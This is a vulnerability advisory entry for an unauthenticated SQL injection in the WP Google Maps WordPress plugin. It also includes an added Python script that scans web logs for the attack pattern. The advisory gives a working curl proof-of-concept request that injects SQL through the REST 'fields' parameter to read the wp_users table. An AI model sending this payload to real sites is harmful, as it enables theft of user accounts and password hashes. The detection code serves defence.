wpexploit / Wpvulndb / WPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA
History: Apr 02, 2019 - 12:00 a.m.

WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection

2019-04-02 00:00:00
wpvulndb
78

EPSS: 0.973 High
Percentile: 99.9%

The REST API code in includes/class.rest-api.php does not sanitize field names before using them in a SELECT statement, leading to an unauthenticated SQL injection issue.

curl -k --silent "http://example.com/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+-"
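
A defender-side check for the request pattern above, as an added example that is not part of the original advisory or the plugin's code: it scans web access-log lines for requests to the wpgmza markers route whose `fields` parameter is anything other than a comma-separated list of column names. The log lines and the column names `id`, `lat`, `lng` are constructed, and treating legitimate `fields` values as plain identifiers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `fields` value is a comma-separated list of column names.
FIELD_LIST = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(?:,[A-Za-z_][A-Za-z0-9_]*)*")
ROUTE = "/wpgmza/v1/markers"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_fields(url):
    """Return decoded `fields` values that are not plain column lists,
    for requests that reach the markers route via ?rest_route= or /wp-json/."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    route = parts.path + "".join(query.get("rest_route", []))
    if ROUTE not in route:
        return []
    return [v for v in query.get("fields", []) if not FIELD_LIST.fullmatch(v)]


def scan(log_lines):
    """Return (line_number, offending_values) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            bad = suspicious_fields(match.group(1))
            if bad:
                hits.append((number, bad))
    return hits


# Constructed sample log lines (documentation IP ranges, invented sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Apr/2019:10:00:01 +0000] "GET /index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=id,lat,lng HTTP/1.1" 200 512',
    '203.0.113.9 - - [02/Apr/2019:10:00:07 +0000] "GET /index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+- HTTP/1.1" 200 4096',
    '203.0.113.9 - - [02/Apr/2019:10:00:09 +0000] "GET /wp-json/wpgmza/v1/markers/?filter=%7B%7D&fields=*+from+wp_users+--+- HTTP/1.1" 200 4096',
    '198.51.100.2 - - [02/Apr/2019:10:01:00 +0000] "GET /index.php?rest_route=/wp/v2/posts&fields=*+from+wp_users HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: non-identifier fields value {values!r}")
```

The same allowlist test, applied server-side to each requested field name before it is placed in the SELECT statement, is the kind of validation the description says is missing.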